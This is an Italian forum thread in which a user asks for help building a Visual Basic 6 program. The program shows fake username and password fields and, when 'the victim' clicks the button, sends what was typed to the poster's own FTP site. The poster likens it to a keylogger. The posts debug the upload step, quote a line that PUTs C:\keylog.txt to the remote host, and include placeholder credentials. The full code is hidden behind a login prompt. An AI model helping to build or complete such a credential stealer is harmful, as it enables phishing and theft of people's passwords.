BlackRoy

Utente Normale
Autore del topic
27 Aprile 2010
66
0
Miglior risposta
0
Salve ragazzi, questo è il mio primo post (oltre a quello nella presentazione) in questo stupendo forum. Scrivo in questa sezione perchè è da poco che uso vb6, ma da tanto che desidero un certo programmino... So un po' le basi del linguaggio visual basiccoso :Muhaha: però non ho la minima idea di come creare questo programma. Vorrei un programma con 2 textbox (una per un username e l'altra per la password) e un command button... Quando la vittima clicca sul command button, invia in qualche modo o alla mia email o al mio sito di altervista un file con scritto dentro il testo che avevo scritto nella Text1.Text e nella Text2.Text. Sostanzialmente credo che sia simile al keylogger, crea un file e lo invia al sito FTP. So che non è molto semplice, ed è per questo che chiedo aiuto a voi!
Spero che mi aiuterete.

BlackRoy

Allora con ctrl + t aggiungi un microsoft internet transfer control e aggiungilo anche nella form con due text e un button

Nel button metti questo

Codice:
Perfavore, Entra oppure Registrati per vedere i codici!

Facendo come hai detto tu all'inizio mi ha dato un errore, dicendo che non trovava il percorso del file o il file [Errore di accesso al percorso/file]. Infatti ( ma non ne sono sicuro) ci sono soltanto le funzioni open e close, e non una per creare il keylog.txt.... A questo punto l'ho creato da me, manualmente, lasciandolo vuoto. Ho riprovato a premere Command1 ed ora è spuntato fuori questo errore: Impossibile completare la richiesta. Adesso riprovando mi da questi errori: "Impossibile connettersi all'Host remoto" oppure l'altro errore dice che l'URL non è stato scritto bene o qualcosa del genere... Se premo Debug mi evidenzia di giallo questa linea: Inet1.Execute Inet1.URL, "PUT C:\keylog.txt " & nomefile
Non so piu cosa fare. Idee?

Se dovesse servire, questi sono i miei dati finti che ho inserito nello script:
account = "MioUsername"
pswd = "Password" 'Password che uso per accedere al sito di altervista
ftpwebsite = "http://MioUsername.altervista.org"

P.S. Sono connesso a Internet
--------------- AGGIUNTA AL POST ---------------
Allora, per prima cosa ho scoperto che Open crea anche il file :emoji_smiley:. Poi ho scoperto che premendo CTRL+T e cercando Microsoft Internet Transfer Control me ne trova uno che si chiama: Internet Transfer Control 6.0 (SP6)... Potrebbe essere questo dell'errore "Impossibile connettersi all'Host Remoto". Non so piu cosa fare. Aiuto!.

BlackRoy

Ultima modifica:
Aiuto perfavore!Ne ho bisogno di questo programma!!! Comunque, adesso mi da solo l'errore "Impossibile connettersi all'Host Remoto".... Aiuto!

Ragazzi, finalmente sono riuscito a risolvere parte del problema (Ho cambiato l'access type da icDefault a icDirect). Adesso riesce ad uploaddarmi il file txt sul sito, però quando vado a vederlo è di 0 Byte e se lo apro mi spunta una pagina bianca! Uffa questi errori non finiscono mai! Vi prego aiutatemi!

BlackRoy

Ultima modifica: